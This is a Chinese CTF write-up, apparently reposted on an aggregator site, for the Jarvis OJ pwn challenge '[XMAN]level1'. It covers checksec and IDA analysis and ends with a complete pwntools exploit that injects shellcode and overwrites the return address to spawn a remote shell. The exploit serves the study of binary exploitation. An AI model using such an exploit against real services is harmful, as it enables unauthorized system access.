首页 > 编程语言 > 详细

Jarvis OJ - [XMAN]level1 - Writeup

时间:2017-09-25 22:46:47      阅读:453      评论:0      收藏:0      [点我收藏+]

Jarvis OJ - [XMAN]level1 - Writeup

M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html

题目:

技术分享

分析

  • checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell

    技术分享

  • 拖到IDA中,查看函数的流程,vulnerable_function函数打印了缓冲区的起始地址,read可以读取0x100个字符,而buf到ret的偏移为0x88 + 0x4 < 0x100,而该elf又是No canary found。

    技术分享

    ?

    技术分享

  • 整理一下现有的信息:

    • 长度为0x100的缓冲区
    • 缓冲区的起始地址
    • 没有打开栈保护和NX保护

    因此,可以把shellcode填到以buf为起始地址的缓冲区里,并控制vulnerable_function返回到shellcode,就可以通过执行shellcode拿到shell

  • ?

步骤

  • 经过如上分析,写出exp如下:

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = M4x
 4 
 5 from pwn import *
 6 context(log_level = debug, arch = i386, os = linux)
 7 
 8 shellcode = asm(shellcraft.sh())
 9 #  io = process(‘./level1‘)
10 io = remote(pwn2.jarvisoj.com, 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + \x90 * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
18 io.close()

 

 

运行exp,拿到flag

技术分享

 

Jarvis OJ - [XMAN]level1 - Writeup

原文:http://www.cnblogs.com/WangAoBo/p/7594173.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!